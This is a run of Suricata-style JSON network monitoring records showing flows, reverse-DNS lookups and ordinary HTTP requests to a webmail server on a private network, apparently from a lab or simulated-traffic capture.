{"timestamp":"2020-02-29T00:06:24.001303+0000","flow_id":644114799654146,"event_type":"flow","src_ip":"192.168.10.122","src_port":41023,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:01:23.849154+0000","end":"2020-02-29T00:01:23.954296+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:24.001991+0000","flow_id":509385984074491,"event_type":"flow","src_ip":"192.168.10.130","src_port":34736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1495,"bytes_toclient":6239,"start":"2020-02-29T00:04:50.025339+0000","end":"2020-02-29T00:05:23.459884+0000","age":33,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:06:25.000302+0000","event_type":"stats","stats":{"uptime":14037,"capture":{"kernel_packets":133563,"kernel_drops":0},"decoder":{"pkts":133563,"bytes":92428978,"invalid":181,"ipv4":132114,"ipv6":8,"ethernet":133563,"raw":0,"null":0,"sll":0,"tcp":127013,"udp":4906,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094752},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2705,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2721,"synack":2712,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1748,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2237,"failed_udp":110},"tx":{"http":4534,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2314}},"flow_mgr":{"closed_pruned":2690,"new_pruned":15,"est_pruned":2282,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20504,"memcap_state":0,"memcap_global":0},"http":{"memuse":44855,"memcap":0}}} {"timestamp":"2020-02-29T00:06:25.001840+0000","flow_id":1948590856745586,"event_type":"flow","src_ip":"192.168.10.122","src_port":59007,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:01:24.471666+0000","end":"2020-02-29T00:01:24.576661+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:30.002978+0000","flow_id":83501324109156,"event_type":"flow","src_ip":"192.168.10.130","src_port":34742,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":10,"bytes_toserver":1167,"bytes_toclient":7936,"start":"2020-02-29T00:05:23.460132+0000","end":"2020-02-29T00:05:29.625666+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:06:30.700781+0000","flow_id":1641341801378157,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43136,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":7519,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:06:30.811812+0000","flow_id":1641341801378157,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43136,"proto":"UDP","dns":{"type":"answer","id":7519,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:06:30.811812+0000","flow_id":1641341801378157,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43136,"proto":"UDP","dns":{"type":"answer","id":7519,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:06:30.847321+0000","flow_id":542306914958372,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34748,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50}} {"timestamp":"2020-02-29T00:06:30.847321+0000","flow_id":542306914958372,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34748,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":29,"tx_id":0}} {"timestamp":"2020-02-29T00:06:31.000843+0000","flow_id":943744603502432,"event_type":"flow","src_ip":"192.168.10.122","src_port":58746,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:01:29.964448+0000","end":"2020-02-29T00:01:30.077302+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:31.436369+0000","flow_id":826869973231761,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35205,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":18967,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:06:32.000213+0000","event_type":"stats","stats":{"uptime":14044,"capture":{"kernel_packets":133571,"kernel_drops":0},"decoder":{"pkts":133580,"bytes":92431195,"invalid":181,"ipv4":132127,"ipv6":8,"ethernet":133580,"raw":0,"null":0,"sll":0,"tcp":127024,"udp":4908,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094464},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2706,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2722,"synack":2713,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1749,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2238,"failed_udp":110},"tx":{"http":4535,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2315}},"flow_mgr":{"closed_pruned":2692,"new_pruned":15,"est_pruned":2285,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20431,"memcap_state":0,"memcap_global":0},"http":{"memuse":40143,"memcap":0}}} {"timestamp":"2020-02-29T00:06:35.851694+0000","flow_id":542306914958372,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34748,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":30,"tx_id":0}} {"timestamp":"2020-02-29T00:06:36.553564+0000","flow_id":826869973231761,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35205,"proto":"UDP","dns":{"type":"answer","id":18967,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:06:36.553564+0000","flow_id":826869973231761,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35205,"proto":"UDP","dns":{"type":"answer","id":18967,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:06:36.623375+0000","flow_id":926165322136906,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52692,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7770}} {"timestamp":"2020-02-29T00:06:39.000306+0000","event_type":"stats","stats":{"uptime":14051,"capture":{"kernel_packets":133592,"kernel_drops":0},"decoder":{"pkts":133605,"bytes":92441637,"invalid":181,"ipv4":132150,"ipv6":8,"ethernet":133605,"raw":0,"null":0,"sll":0,"tcp":127044,"udp":4910,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2707,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2723,"synack":2714,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1750,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2239,"failed_udp":110},"tx":{"http":4536,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2316}},"flow_mgr":{"closed_pruned":2692,"new_pruned":15,"est_pruned":2286,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20503,"memcap_state":0,"memcap_global":0},"http":{"memuse":108161,"memcap":0}}} {"timestamp":"2020-02-29T00:06:41.624581+0000","flow_id":926165322136906,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52692,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7770},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":42655,"tx_id":0}} {"timestamp":"2020-02-29T00:06:41.867378+0000","flow_id":157748428880946,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46214,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62371,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:06:41.975863+0000","flow_id":157748428880946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46214,"proto":"UDP","dns":{"type":"answer","id":62371,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:06:41.975863+0000","flow_id":157748428880946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46214,"proto":"UDP","dns":{"type":"answer","id":62371,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:06:42.066598+0000","flow_id":1874300828193260,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52694,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5273}} {"timestamp":"2020-02-29T00:06:42.582426+0000","flow_id":446408885986074,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43798,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":48233,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:06:42.690395+0000","flow_id":446408885986074,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43798,"proto":"UDP","dns":{"type":"answer","id":48233,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:06:42.690395+0000","flow_id":446408885986074,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43798,"proto":"UDP","dns":{"type":"answer","id":48233,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:06:42.845851+0000","flow_id":2186244303009272,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34750,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6892}} {"timestamp":"2020-02-29T00:06:46.000415+0000","event_type":"stats","stats":{"uptime":14058,"capture":{"kernel_packets":133618,"kernel_drops":0},"decoder":{"pkts":133643,"bytes":92458310,"invalid":181,"ipv4":132188,"ipv6":8,"ethernet":133643,"raw":0,"null":0,"sll":0,"tcp":127078,"udp":4914,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2709,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2725,"synack":2716,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1752,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2241,"failed_udp":110},"tx":{"http":4538,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2318}},"flow_mgr":{"closed_pruned":2692,"new_pruned":15,"est_pruned":2286,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21164,"memcap_state":0,"memcap_global":0},"http":{"memuse":137984,"memcap":0}}} {"timestamp":"2020-02-29T00:06:47.067491+0000","flow_id":1874300828193260,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52694,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5273},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":25872,"tx_id":0}} {"timestamp":"2020-02-29T00:06:47.850714+0000","flow_id":2186244303009272,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34750,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6892},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":35875,"tx_id":0}} {"timestamp":"2020-02-29T00:06:48.000500+0000","flow_id":1275784246733683,"event_type":"flow","src_ip":"192.168.10.81","src_port":52688,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":12,"bytes_toserver":1664,"bytes_toclient":7838,"start":"2020-02-29T00:05:42.404339+0000","end":"2020-02-29T00:05:47.657846+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:06:48.001717+0000","flow_id":448856997904054,"event_type":"flow","src_ip":"192.168.10.122","src_port":56014,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:01:46.933558+0000","end":"2020-02-29T00:01:47.039247+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:48.002381+0000","flow_id":1377287193441638,"event_type":"flow","src_ip":"192.168.10.122","src_port":52259,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:01:47.144742+0000","end":"2020-02-29T00:01:47.250009+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:48.579771+0000","flow_id":1668915492608187,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58818,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":48270,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:06:48.688271+0000","flow_id":1668915492608187,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58818,"proto":"UDP","dns":{"type":"answer","id":48270,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:06:48.688271+0000","flow_id":1668915492608187,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58818,"proto":"UDP","dns":{"type":"answer","id":48270,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:06:48.768128+0000","flow_id":117556125411825,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34752,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3981}} {"timestamp":"2020-02-29T00:06:53.000179+0000","event_type":"stats","stats":{"uptime":14065,"capture":{"kernel_packets":133655,"kernel_drops":0},"decoder":{"pkts":133665,"bytes":92464732,"invalid":181,"ipv4":132208,"ipv6":8,"ethernet":133665,"raw":0,"null":0,"sll":0,"tcp":127096,"udp":4916,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2710,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2726,"synack":2717,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1753,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2242,"failed_udp":110},"tx":{"http":4539,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2319}},"flow_mgr":{"closed_pruned":2693,"new_pruned":15,"est_pruned":2288,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20833,"memcap_state":0,"memcap_global":0},"http":{"memuse":52445,"memcap":0}}} {"timestamp":"2020-02-29T00:06:53.521339+0000","flow_id":117556125411825,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34752,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3981},"app_proto":"http","fileinfo":{"filename":"\/turba\/","state":"CLOSED","stored":false,"size":19150,"tx_id":0}} {"timestamp":"2020-02-29T00:06:53.530561+0000","flow_id":397725432354945,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45988,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":36766,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:06:53.639563+0000","flow_id":397725432354945,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45988,"proto":"UDP","dns":{"type":"answer","id":36766,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:06:53.639563+0000","flow_id":397725432354945,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45988,"proto":"UDP","dns":{"type":"answer","id":36766,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:06:54.152239+0000","flow_id":117556125411825,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34752,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":19005}} {"timestamp":"2020-02-29T00:06:56.895861+0000","flow_id":459856429493109,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36544,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":3163,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:06:57.004740+0000","flow_id":459856429493109,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36544,"proto":"UDP","dns":{"type":"answer","id":3163,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:06:57.004740+0000","flow_id":459856429493109,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36544,"proto":"UDP","dns":{"type":"answer","id":3163,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 